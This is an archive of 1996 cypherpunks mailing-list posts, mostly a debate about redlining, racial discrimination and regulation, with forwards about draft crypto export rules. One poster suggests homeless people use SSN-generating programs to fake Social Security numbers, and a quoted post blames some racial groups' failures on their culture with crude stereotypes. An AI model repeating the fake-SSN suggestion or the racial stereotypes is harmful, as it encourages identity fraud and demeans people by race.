To: nobody@huge.cajones.com (Huge Cajones Remailer)
Subject: Re: Redlining
Message-ID: <3.0.32.19961211151422.0068b9f0@execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

My point, Red, at the outset was that your tendency to address each point
in turn was not being fruitful to me (my time is a scarce resource).
Surely you do not make policy decisions based upon how much time someone
has to address your concerns.

>>My question was a real one.  The basis of it comes from my work with
>>the homeless in which they have a difficult time getting a job
>>because they have no "home address" to put on the forms, some do not
>>have or remember their SSNs, etc.  This causes a cyclic problem for
>>the homeless.  My question to Tim was, in the real world, how is the
>>protection of this data feasible.
>
>The way you protect your home address is by using another address for
>work which is not your home.  The way I would do this is to find a
>mail box service which offers addresses that look like a home.
>
>A homeless person might find somebody with a home (like you) who will
>receive their work related mail for them.
>
>A "phone" is easy to get, too.  You can get a telephone number which
>is linked to a voicemail box.  You can even get this number listed in
>the telephone book, if you like.  The cost of this service should be
>less than twenty dollars a month.  If you want to go wild, you can get
>a pager linked voicemail number.  This means your pager goes off when
>you get a message.  Handy.
>
>But, even this small expense may be out of reach of a homeless person
>or a homeless advocate.  

This is a good attempt at intellectual honesty which was present in your
original reply but lacking thereafter.  That aftermath explains my tone in
my later replies.  I apologize.

>What you can do is get a second line for your
>home and keep it unlisted.  Then, give it to your homeless friends for
>work related purposes.  If the number is only used for work messages,
>you could probably handle over a hundred people on this one line.

This is actually a great idea.  In my real world, I am criticized for
taking on the problems of others before myself.  While I could work this
out, I border on the problem of ignoring (or bypassing) the concerns of my
family, which is my prime motivator.  I am not saying this is not a great
idea.  

>As for the social security number, it has been claimed many times on
>this list that nobody checks them anyway.  There are programs which
>generate real-appearing numbers.  (I think one was called "ssn.exe".)

While I understand the greater social good, I, personally, am not
interested in violating applicable fraud statutes.  This is a borderline
case in which consideration to the idea, of course, should be given.  I
would hesitate to expose these people to that risk.

>And, you can go to the SSA to find out somebody's SS number or to have
>one issued.  It will take awhile.

This is the best way to address the problem.  But, it leads to my original
quandry (not redlining) which was how some people can, realistically,
protect this data.  You do give some good opportunities.  For me they are
unacceptable and on balance, I would suggest that people go the latter
route and attempt to comply with the statist regulations.  Maybe in a more
perfect society, they would have an interest in privacy.  In the world
today, however, I think they would choose to eat.

>>I do have responses to each of your "points" in your last post, but have
>>found the process of responding point-by-point tedious and non-productive
>>(maybe less productive than the time I have to give to the exercise, I was
>>not intending on placing a value judgement on it).
>
>This gives the appearance that you are avoiding the points I raised.
>My conclusion is that your views are indefensible.  Having described
>my views on the poor as "idiotic", I think it is in poor taste to
>withdraw from the field without justifying your claim.

I claimed that well after your posts became far more condescending than
fruitful.  You stated your assumptions as fact and dismissed my points with
several fininely tuned snips.  I really dont care if you find it in poor
taste here, because this list is as close to an anarchy as we will get.  I
do not have to abide by your construct of good argument if i dont want to.
If I wanted to I could repeatedly issue heart-wrenching stories of poverty
in America (similar, of course, to politicians using "real world examples"
in speeches).  You seem to assume that this would be "wrong".

I have said, repeatedly, that we disagree.  Apparently, now I have to
*reiterate* why.  I am not trying to convert you, Red.  I have no reason
to.  My response, on which you jumped, was a pointed question to Tim about
the reality of privacy protection.

Once again, we disagree.  You do not favor any form of government
regulation.  I do favor some forms of government regulation.  It seems that
the turning point for you is your belief that racism causes no real harm.
I disagree.  If you really want to have a list of the harms caused by
racism, I will list them in a seperate note to you.  I wish you could be
intellectually honest enough to realize these harms.  I fear, however, you
will not be.

>>As the topic quickly wandered from the original post on privacy
>>concerns to racial discrimination, I will address that.  I apologize
>>to the list (for those that find it irrelevant), but I can not reply
>>directly to Red.
>
>Cryptoanarchy is not friendly to schemes to prohibit racial
>discrimination.  Indeed, it is unfriendly to any scheme which attempts
>to control the relationships between people.

I do not know where you live, but I live in the US.  Cryptoanarchy has not
taken hold here yet.  As such, my discourse is regarding the political
system in which I live.  As such I favor regulating behavior between the
small number of protected classes and the small number of covered
transactions (employment, housing, etc.).  You, OTOH, do not.

>>I, personally, find racial discrimination to be a problem in the USA.
>
>It would be nice if everybody in the U.S. was not a racist.  It would
>be nice if all the bad people just left.

Actually, it would be preferable if they would become enlightened.  It is
difficult to do.  I try every day.  BTW, if the comment above was supposed
to be aimed at me, once again i *never* made any such assertion.

>>Not only do I find it a moral problem, but it has adverse effects on
>>markets and the efficiency of these same markets.  It is costly not
>>only in personal measures, but in economical terms as well.

>But, of course, I don't subscribe to the notion that market efficiency
>is the best means of determining policy.  For one thing, concepts such
>as efficiency and production are politically defined.  If I grow food
>for myself, it does not affect GDP figures.  If I trade the food for
>money and buy something, then the same production increases GDP.  This
>is not sensible.

I subscribe to the notion that policy should be determined by the best
balance of several concerns.  Among these are market efficiency, social
justice, budget constraint and liberty.  I am unsure how you would
determine policy.

>More importantly, I don't believe that market efficiency, however
>measured, is sufficient justification for dictating other people's
>actions.  "Market efficiency" is a gambit to conceal dictatorial
>powers in a scientific cloak.

Maybe for some, but if you have assumed that is how I act you are mistaken.
As I said, I would determine policy based upon a wide range of competing
interests.  You seem to be violating your own "rule" about not utilizing
concepts such as the "libertarians wet dream".  Many believe the same about
the "gambit to conceal dictatorial powers in a scientific cloak."
Apparently those "rules" only apply to others.

>Discussions of market efficiency typically overrule the preference
>that citizens have.  One could imagine that a study that concluded
>alcohol consumption reduced national efficiency and should therefore
>be banned.  Yet, this completely fails to take into account the strong
>preference many people have to drink.  Some even consider it to be a
>religious sacrament.  I don't believe such preferences should be
>ignored.  They should be respected.

And neither do I.  On balance, I would not have accepted prohibition then,
and I do not accept it now.  People also have a preference not to hire
blacks.  I feel that that should not be an acceptable means of interaction
between an employer and a prospective employee.  You do.  That is what I
meant by drawing lines.  You feel that every employer (a creation of the
state) should have the ability to act in a discriminatory fashion.  I
disagree.  You and I do agree that when the personal excercise is for a
drink, the government should not respond.  This is because, on balance, I
believe that the excercise of that freedom is more important than the
adverse effects of alcoholism.  And vice versa for employment discrimination.

>Likewise, if somebody just cannot stand Albanians, we should respect
>their preference even though we may personally disagree with it and
>even though we may believe it makes the annual GDP number lower.

Once again, I would determine policy based on several competing interests.
Aparently you would determine it on a notion of absolute freedom.  I am
trying not to assume anything.  And for the record, I have only supported
governmental intervention in currently accepted transactions, which do not
cover individuals wanting to hold racist beliefs.

>I am not sure exactly what "costly ... in personal measures" means.
>If you mean that somebody who will not speak with Albanians is
>deprived of rewarding friendships they might otherwise have, that is
>probably true.  On the other hand, the Albanian-hater will not see it
>that way.  That is his or her tough luck.

Actually I was referencing the effects upon the discriminated against.    

>>I do expect many on the list to disagree with me....They will
>>disagree that it affects markets in any way.
>
>Just for the record, I can imagine that racial prejudice could have a
>slight effect on mortgage prices (i.e, interest).  But, since the CMO
>revolution, I am inclined to believe that effect will be quite small
>and is probably unnoticeable.
>
>>They will assert that legislative restrictions are far worse than
>>industry self-policing.
>
>Just for the record, I am not advocating "industry self-policing".
>Policing is what I disagree with.
>
>>More will disagree that the government has any business regulating
>>the area.  As I had stated simply before, I disagree.
>
>All you have really said is "I believe X."  Should we take your belief
>on faith or are there reasons which underly your beliefs?
>

I believe in regulating, in one instance, employment discrimination.  I do
so because I have personally seen the economic impact on the Greater
Milwaukee Area of such discrimination - both past and present.  I believe X
also because I have been witness to the personal impact that such
discrimination has upon people.  To take advantage of practices effective
against poverty, several of which you have mentioned, it helps to have
self-confidence and a degree of self-worth.  These are directly damaged by
employment discrimination.  I believe that the elimination of redlining
would help to increase capital flows into some of these affected areas.
Even if, as you stated, the elimination would allow for a few token
investments in order for banks to appear to be in compliance, that is a
willing trade off for me.  It is not for you.

>>Thru painful learning experiences and reality checks - long arguments
>>over several months and too much coffee - I decided that I would not
>>want to live in a libertarian's ideal society.  This decision was
>>based on my perception that it just wouldnt work in reality.

^^^^^^^This was, of course, my explanation before.  Apparently you didnt
see it.
I was not using libertarian's ideal society in any derogitive way.  At one
time I believed in it.  Through self-examination I decided that it couldnt
work.  Is your point that you disagree with me or that Anyone who disagrees
with you must be wrong?

>>>I'm sure many readers of this list have had conversations which
>>>abruptly end with "Are you a Libertarian?", which is generally
>>>completely irrelevant to the point under discussion.  What is
>>>happening is that the other person is more interested in knowing your
>>>tribal identification than what you believe.  A pity.
>>
>>As strange as it may sound to you, most of my conversations go this
>>way.  It is ironic to me that I have been placed on this side of an
>>argument.
>
>Yet, you are doing something very similar when you raise the issue of
>"a libertarian's ideal society".  Likewise, you criticized Tim May for
>having (roughly) "too absolute a theory".  In either case, you are
>avoiding substantive discussion, preferring to make prejudicial
>remarks.

Actually that is the substance of my dissention.  I do not believe in those
theories which results in my favoring X.  You disagree and favor an
absolute theory of freedom (I may be wrong, but you have never asserted
your underlying political theory).  My policy decisions are based upon my
political philosophy.  As are yours, I assume.  I never said, Tim was "bad"
because of his theory.  I was simply pointing out that I did not agree with
it.

>Here we are discussing some very specific policies and their ethical
>implications.  There is no need to raise the specter of the
>"libertarian ideal society".  

You have labeled it a specter, not me.  I have the utmost respect for
libertarians.  It was simply a way to reference the subject matter.

>One nice thing about Libertarian-style
>discussions is that most of the policies are separable; that is, we
>can discuss redlining without discussing highway privatization.  This
>makes a nice contrast to other styles of discussion in which the
>proposed scheme only works if everybody participates.  The most
>extreme example was Marxism where it was claimed that it would fail if
>the entire world was not Marxist.

You appear here to admit that it is possible to favor one libertarian
policy while disagreeing with another.  That is what I am doing.  

>>Do you tend to think of me now as "less of a Libertarian" much as
>>your forewarned "In the House" black reference?
>
>"In the house"?  This appears to be an American idiom which I haven't
>learned yet.

Sorry. Mixing my replies.  That was someone else. ;-)

>I used the word "forewarned" once.  I said that it would be hard to
>believe that even wealthy African-Americans were racist in their
>lending practices.  I still find it hard to believe.
>
>It may surprise you to know that I am not all the interested in
>whether you call yourself a Libertarian.

Doesnt suprise me at all.  You are only interested in your political
philosophy.  When it is relevant to my political philosophy and the way in
which I would make policy decisions apprently it is irrelevant.  It is not
to me.

>>>Do we then believe that we should outlaw the actions they take based
>>>on these beliefs?  So long as the people in question are doing no
>>>harm, I propose we leave them alone to live their lives.
>>
>>This is the essence of, at least, my disagreement with you Red.  I
>>dont agree that redlining doesnt harm people.  You see no harm.  I
>>do.
>
>Your reluctance to discuss the nature of the harm you perceive does
>not give the impression that you have good reasons for your
>perception.

Much as the line of Don Wood argument, I have no interest in educating you.
 If you are really interested I will roll out what I perceive as the many
harms caused by racism.  Unlike you, I am in no rush to call your reasons
for your beliefs "good" or "bad".  You believe as you do.  You do so
because of personal reasons.  I believe as I do, that racism harms people.
I do so because of my personal experiences.  Among these are employees
explaining to me the nature of the discrimination that they have suffered,
their inability to pursue any such claims because of a lack of both
self-confidence as well as capital, the faces of their children that do not
yet understand the nature of the world they have been brought into and the
immense stress on familial relationships caused by the lack of a job caused
by employment discrimination.  Ill even discard the borderline cases and
refer to the slam dunk cases out there.  I live and work in Milwaukee, Red.
 People are fired and told they are fired because they are black.  I have
settled cases with no dispute of these facts.  All of the personal harm and
more was suffered by my clients.  This is part of the reason for my
perception.  I wish I lived where you did where racism hurts nobody.  Just
give me a general location and Ill start to move my clients there ;-|.

>
>Red Rackham

Matt
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMq8kIrpijqL8wiT1AQHNlgP8CoLXjtvPukDuNKu0hi7JHp7ev8HoKVo9
1sMWS5ycOaUvHW/LK81TvmZ15ViCSlqz17TCgkXEw0uvFoaFXkjVcheyBF891blF
MuAiBWe+O+R/ZkZ9GcD0tiO9bdk+MBYxLiNTffcQJZnEvV8obxi9zG5l5s4rcd/J
Y1JYNtaYTkk=
=EqBg
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Wed, 11 Dec 1996 15:15:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Redlining
Message-ID: <199612112315.PAA21045@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain



At 11:47 AM 12/11/1996, Timothy C. May wrote:
>1. The _general_ subjects of "bigotry" and "redlining" are not
>closely related to themes of this list, though the implications of
>strong privacy for these issues is certainly on topic. (And my views
>on these implications are well known...I've seen no point to step in
>to the debate to repeat them, and don't plan to argue with Matt M.
>about the "evils of bigotry.")
>
>2. Many of the posts by Matt M. and "Red Rackham" and others have
>been so massive, containing paragraph-by-paragraph rebuttals of
>political and ethical points, that I've just given up on trying to
>follow the points.
>
>If anyone has well-formed questions about how redlining and "bigotry"
>is affected by strong cryptography and crypto anarchy, fire away.
>Just don't bury them deep in a long diatribe about the evils of
>"prejudice" and "discrimination."

Didn't Tim May originate the "Generation of Science" thread or,
earlier, the sliderule thread?  I don't think either topic can said to
be strictly cypherpunk unless a discrete logarithm sliderule has been
invented.

The truth is that I enjoyed those threads as did most others on the
list.  I would like to see more like them.  And, I dare say that my
posts are more worthwhile than 7 out of 8 posts we've been seeing on
the list lately.

>(Personally, and off-topic for the list (so I'll be brief),...

Point 1: You obviously find the subject interesting enough to comment
on it.  Others probably also find it interesting.

Point 2: Excuse me if I am wrong, but your comments look to me to be
precisely on topic for this list, anyway.

>...the ills of our society seem to me to have _very little_ to do
>with "prejudice." In fact, most people are not "discriminating"
>enough, in the sense that discrimination implies value judgements and
>assessments of probable success based on data available. As someone
>noted, the Asian communities in the U.S. are doing well and are quite
>"discriminatory" in lending policies. Get used to it, as crypto
>anarchy will make coerced transactions even more difficult. The
>racial and ethnic groups which are most into "victimology" are the
>least successful--which is _cause_ and which is _effect_ may be
>debatable to many of you, but the correlation is very clear....maybe
>it's time they try something different, like getting their culture to
>embrace learning, reading, science, math, and business success,
>instead of glorifying victimization, crack cocaine, basketball stars,
>and pimps.)

This obsession of "on topic/off topic" is not healthy for the list.
It stifles brainstorming and the free exchange of ideas.

Red Rackham

P.S. Sorry for the length of some of the messages.  That Miszewski had
the temerity to actually stand up for his beliefs, so it was
unavoidable.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Wed, 11 Dec 1996 13:19:55 -0800 (PST)
To: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Redlining
Message-ID: <3.0.32.19961211151926.0068b9f0@execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 11:31 AM 12/11/96 EDT, E. Allen Smith wrote:
>From:	IN%"mjmiski@execpc.com"  "Matthew J. Miszewski" 11-DEC-1996 03:52:03.23
>
>>This is the essence of, at least, my disagreement with you Red.  I dont
>>agree that redlining doesnt harm people.  You see no harm.  I do.
>
>	Of course redlining causes harm to those who are redlined... they
>can't get credit. But the same can be said of any system of keeping
>track of who is likely to repay credit; it means that someone who has
>defaulted on past loans won't get future ones. Quite simply, while I
>would agree with you that racism certainly persists (it would be
>difficult for me to grow up in the South and not see this), I would
>argue that you have no evidence for that the basic motivation behind
>redlining is that the people in such areas are less likely to repay
>credit.

Actually, my assertion was that the basic motivation was racism and
ignorance.  My example of student loan default rates should clear that up.
College graduates generally live outside of redlines and yet are regularly
offered credit.  And yet default rates on student loans are outrageous (the
government backing of these loans is irrelevant to individual
creditworthiness).


>	-Allen

Matt
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMq8lWbpijqL8wiT1AQF+HQQApA1oGLXhfaxKH8MyDi3HCH2sk2LzKqSB
3DDgKPfyU0nRtGvaLk5xN+8LqmKoQsccJX9Z50+c6Tj+ENE8NAALw9NUsb8ZjV0a
zB1iKG0eXgvm4X9Hvg9em/rjA6NlzXW037TJkyg9BCfhgUJN2bRF4J9wupTZJlI3
rzrXV9pgBN0=
=/DwJ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 11 Dec 1996 12:23:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Commerce Crypto Export Regs
Message-ID: <1.5.4.32.19961211201959.0067ef58@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Forward from: cyberia-l@listserv.aol.com
Date: Wed, 11 Dec 1996 11:55:52 -0800
From: Cindy Cohn <Cindy@MCGLASHAN.COM>
Subject:      Draft of Commerce Department Crypto Regs

Steptoe and Johnson have kindly posted the draft Commerce Department
regulations on encryption exports at http://www.steptoe.com/commerce.htm.

[Snip]

If you have trouble getting through, we've mirrored this document at: 

     http://jya.com/commerce.htm








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Lesher / hated by RBOC's in 5 states" <wb8foz@wauug.erols.com>
Date: Wed, 11 Dec 1996 12:35:37 -0800 (PST)
To: cypherpunks@toad.com (Cypherpunks)
Subject: Draft of Commerce Department Crypto Regs (fwd)
Message-ID: <199612112035.PAA09754@wauug.erols.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Cindy Cohn <Cindy@MCGLASHAN.COM>
Subject:      Draft of Commerce Department Crypto Regs
via: CYBERIA-L@LISTSERV.AOL.COM

Steptoe and Johnson have kindly posted the draft Commerce Department
regulations on encryption exports at http://www.steptoe.com/commerce.htm.

Of most interest to those of us concerned about the First Amendment is the
provision which eliminates the "publicly available" exception to the EAR and
states "controlled software will not be eligible for "publicly available"
treatment, even if the source code or object code is published in a book or
other mdia."

It also eliminates the exceptions for educational information and
fundamental research contained in the EAR for source code and object code.

I haven't had a chance to review the rest in any detail.

Cindy
************************
Cindy A. Cohn
McGlashan & Sarrail, P. C.
-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Wed, 11 Dec 1996 15:46:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Credentials without Identity--Race Bits
Message-ID: <199612112346.PAA26588@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain



At 12:38 PM 12/11/1996, Timothy C. May wrote: By the way, on this
>oftentimes off-topic issue of "bigotry" and "racism," here's a zinger
>some of you may not have thought much about. And it's certainly
>related to the themes of Chaumian "credentials without identity,"
>which is very much on-topic.
>
>While it has been claimed by some that "crypto anarchy" means that
>race won't matter, that cyberspace interactions will be color-blind,
>this is misleading.
>
>While many--probably most--users will care only for cyberspace
>personna issues, and not meatspace personna issues of race, color,
>height, weight, etc., this is not something built in to anonymous
>transactions.
>
>Consider a "race credential" offered by some entity. Perhaps one goes
>down to the local Aryan Nations office and gets one's genetic
>heritage stamped, or down to the Kwanzaa Youth Center to be similarly
>stamped....
>
>(Why some groups might want this is left as an exercise for the
>reader.  Perhaps a less-inflammatory example (to some of the
>sensitive amongst you) might be that some women want to interact in
>"women only" forums--a clear case of discrimination, no?--and may
>want a "gender bit" avaiable to display as a credential.)

Tim May is to be commended for making this fine point.  I simply had
not thought of this possibility.  This is also empirical evidence of
the worth of a wide ranging discussion.  If Matt and I hadn't pursued
our discussion, this excellent point would not have been made.

As Tim has pointed out, it is time to reconsider our beliefs regarding
the morality of discrimination.  The fact is, sometimes we like to
spend time with people who have a lot in common with ourselves.  This
often supports a higher level of communication because the parties
involved really understand where the other is coming from.

This is true of men in the locker room, women, Albanians, or whomever.
And what is occuring is not even a bad thing.  It's good for people to
spend time with people they like and respect or at least know well.
("No man is a hero to his valet.")

The "politically correct" fully recognize this.  That is why they see
gay groups, feminist groups, etc. as worthwhile.  It is only people
perceived as successful or powerful who are not supposed to associate
with each other.  Instead, they are expected to volunteer their time
and personalities for everyone else's benefit.  Somehow we never hear
what they are supposed to receive in return for this, but I am
guessing they are supposed to lovingly accept rudeness, abuse, and
guilt for their services.

Tim said in another message that there are times when discrimination
is rational.  I have no doubt this is true.  How often do we look at a
degree from MIT on a resume and hire?

The degree to which we fear cryptoanarchy is the degree to which we
fear leaving people alone to run their lives as they see fit.  I do
not greatly fear cryptoanarchy.

Red Rackham






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 11 Dec 1996 15:56:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Redlining
In-Reply-To: <v03007803aed4c54f9c32@[207.167.93.63]>
Message-ID: <v03007802aed4fae4d4ab@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:07 PM -0600 12/11/96, Igor Chudov @ home wrote:

>Correlation is not an evidence of discrimination, at least to me.
>

Nor is it to me. So neither of us will likely object to the neural
net-based lending programs which feed in a bunch of applicant data points,
train the net by providing feedback on who repaid their loans and with what
complications, etc. Even if such nets end up rejecting
"otherwise-qualified" (a la your other post) applicants in such a way that
the accept/reject ratios appear strongly correlated with certain
ethnicities?

(Another member of the list sent me private e-mail about his experiences
writing a "scoring program" for a bank making just the kinds of loans we're
talking about here. He recounted his bank's very real experiences with loan
paybacks by various ethnic and national groups. Nothing very surprising, to
me.)

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 11 Dec 1996 14:38:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Java DES breaker?
In-Reply-To: <6uBsyD129w165w@bwalk.dm.com>
Message-ID: <199612112233.QAA02084@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Dr.Dimitri Vulis KOTM wrote:
> Ray Arachelian <sunder@brainlink.com> writes:
> 
> I happen to have a Sparc 20 box and a Linux box and a SCO box, and ActiveX
> won't work on any of those. I also work with a bunch of other equipment
> that's much faster than a PC, but doesn't run browsers. (Most of it is not
> connected to the 'net for security reasons, but that's besides the point.)
> 
> If Bill's client is sure to run the platforms that MS IE runs on, then this is
> not a consideration.
> 
> Interpreted FORTH bytestream (which is what Java is) may be "doing quite well"
> when drawing GUI gizmos and widgets, but it can't get anywhere near the
> performance of hand-optimizer assembler that you can stick into ActiveX.

I do not see any reason why Java code cannot be compiled. I think that
now there are java compilers available. Maybe even browsers will have
smarts to compile code that they execute.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Wed, 11 Dec 1996 16:38:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: New export controls to include code signing applications
Message-ID: <3.0.32.19961211163934.006a08a0@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


It has been speculated in the past that certain crypto schemes, such as
proposed by Microsoft and Sun, using signed crypto plugins might be helpful
to the cause for strong crypto if non-US branches of US software companies
would certify foreign developed crypto software.

According to the recent proposal by Commerce, this will not happen. It will
be illegal to export the software required to sign the code. So much for
the government's claim that they make no attempt to limit the export of
signing-only software.

>From http://www.steptoe.com/commerce.htm

[Listing specific software prohibited from export]
"c.2. "Software" to certify "software" controlled by 5D002.c.1; "

And, btw, virus checkers are also prohibited from export. Makes you wonder.

"c.3. "Software" designed or modified to protect against malicious computer
damage, e.g., viruses;"


-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Make your mark in the history of mathematics. Use the spare cycles of
   your PC/PPC/UNIX box to help find a new prime.
   http://ourworld.compuserve.com/homepages/justforfun/prime.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brett Carswell <brettc@tritro.com.au>
Date: Tue, 10 Dec 1996 22:43:29 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: RE: Virus?
Message-ID: <c=AU%a=_%p=Tritronics_.Aust%l=TRI_NT5-961211064125Z-526@net.tritro.com.au>
MIME-Version: 1.0
Content-Type: text/plain


>
>Also does anybody know where I could find a downloadable Win95 upgrade 
>upgrading Windows 3.x to Win95?

ftp://ftp.microsoft.com/^L^O^S^E^R




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Wed, 11 Dec 1996 14:43:03 -0800 (PST)
To: Douglas Barnes <cman@c2.net>
Subject: Re: Redlining
Message-ID: <3.0.32.19961211164237.0068ac74@execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 11:25 AM 12/11/96 -0800, Douglas Barnes wrote:

[snipped]
>The more enlightened answer is to back off enough on the regulation so
>that marginal loan markets become attractive business opportunities,
>and any truly irrational lending practices (e.g. based on race) lead 
>directly to losing business to a competitor.

This does appear to address both my moral concern (raced-based lending) as
well as my liberty concern (favorability of less regulation).  I support
the repeal of much of the over-burdensome banking regulation already in
existence.  I continue to work closely with a Congresscritter who satrted
off on the Banking Committee (Now has a good Ways and Means seat) whom I
have expressed my concerns to.  What helps is to have concrete deregulation
proposals.  In Wisconsin I have supported the extension of personal
property tax exemptions to business computers (and an elimination of the
personal property tax in total.)

While discussions on the list often deal with theory it is important for
those with the inclination, to act.  Cypherpunks write Code (as in USCA? ;-)


>
>Doug
>

Matt


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMq8417pijqL8wiT1AQG6oQP/R8FyZkLz7e6BanUVtP5cQnnwG6FpbupS
OWVm/flpKhBOx5T/FL61z8GXbcmqfxqbeBju0MB0WpPJIl1p1nLXqAqsA30ffofY
yj3CLN3MXPOYXipttuxYMQoFBjwr99C0kl6kIBYwfvOarR/fffNvoPTXKigM8tCX
kpJnEV0Eufg=
=MYuQ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com
Date: Wed, 11 Dec 1996 15:47:44 -0800 (PST)
To: "Matthew J. Miszewski" <mjmiski@execpc.com>
Subject: Re: Redlining
Message-ID: <199612112347.QAA08954@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


M. Miszewski wrote:

>Actually, my assertion was that the basic motivation was racism and
>ignorance.  My example of student loan default rates should clear that up.
>College graduates generally live outside of redlines and yet are regularly
>offered credit.  And yet default rates on student loans are outrageous (the
>government backing of these loans is irrelevant to individual
>creditworthiness).

Whoa!

How 'bout backin' out minority-oriented "beauty" and other phony trade
"schools" from your assertions?

Looka-here: the moment that you exclude merit from scholastic and credit
decisons, the more that you get into unfortunate decisons for society.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 11 Dec 1996 15:10:52 -0800 (PST)
To: tcmay@got.net (Timothy C. May)
Subject: Re: Redlining
In-Reply-To: <v03007802aed4c09f8265@[207.167.93.63]>
Message-ID: <199612112304.RAA02304@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Timothy C. May wrote:
> What is lost on many people who denounce "racism" and demand that banks
> give equal percentages of banks to various allegedly aggrieved "oppressed
> minorities," based on various quotas, is that the loan process is almost
> totally driven by _greed_, as it should be. Any bank which practices
> "stupid racism," e.g, by ignoring good payback prospects because of
> tangential or unimportant criteria, faces lost business.

Please correct me, but your representation of what such people demand
is totally wrong.

No one demands that blacks should be given as much loans as whites.

The idea of equal opportunity is that people of equal standing (ie,
people with similar credit histories, incomes, levels of savings, and
so on) be given same consideration regardless of race.

Example: Suppose Mr. White makes $50,000 a year, has 3 credit cards and
has never defaulted on anything. Suppose Mr. Black makes $50,000 a year,
has 3 credit cards and has never defaulted on anything. The law, as I 
understand it, required that they both must be treated equally.

Understanding of that definition of discrimination by many laypeople is
simply distorted by the fact that blacks, on average, have lower incomes
due to many factors, of which many are often their own fault. Since
incidence of poor credit standing is higher among blacks, the average
amount of loans received by blacks is _not an evidence of discrimination_,
at least it should not be to reasonable people.

There are other issues when some demand that there should be programs
helping blacks (or any other category) achieve higher income. These
programs are separate issue from what we are discussing.

Also, some posters here mix totally different issues: 1) what is 
discrimination and 2) should the government do anything about it
or not.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 11 Dec 1996 15:11:00 -0800 (PST)
To: tcmay@got.net (Timothy C. May)
Subject: Re: Redlining
In-Reply-To: <v03007803aed4c54f9c32@[207.167.93.63]>
Message-ID: <199612112307.RAA02329@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Timothy C. May wrote:
> 
> At 12:43 PM -0600 12/11/96, Igor Chudov @ home wrote:
> >
> >The problem is, people can choose what credit history they want to have
> >(I can be a saver or a spender, for example), but nobody can change the
> >color of their skin.
> >
> >This is central point of the theory why discrimination based on credit
> >histories is OK, while the discrimination based on race is not.
> 
> But of course one also cannot change one's gender, age (except by waiting),
> or national origin, marital status (at least not easily), etc. and yet
> these often offer correlation data on expectation of payback.
> 

Correlation is not an evidence of discrimination, at least to me.

See my another post.

You need to do a cross-sectional analysis to find out whether
discrimination takes place.

I would appreciate if some attorney on this list shed some light on the
legal definition of discrimination.

Thanks.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com
Date: Wed, 11 Dec 1996 16:22:26 -0800 (PST)
To: "Matthew J. Miszewski" <mjmiski@execpc.com>
Subject: Re: Redlining
Message-ID: <199612120021.RAA22769@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Matt Miszewski wrote:
(snip)
> I wish I lived where you did where racism hurts nobody.  Just
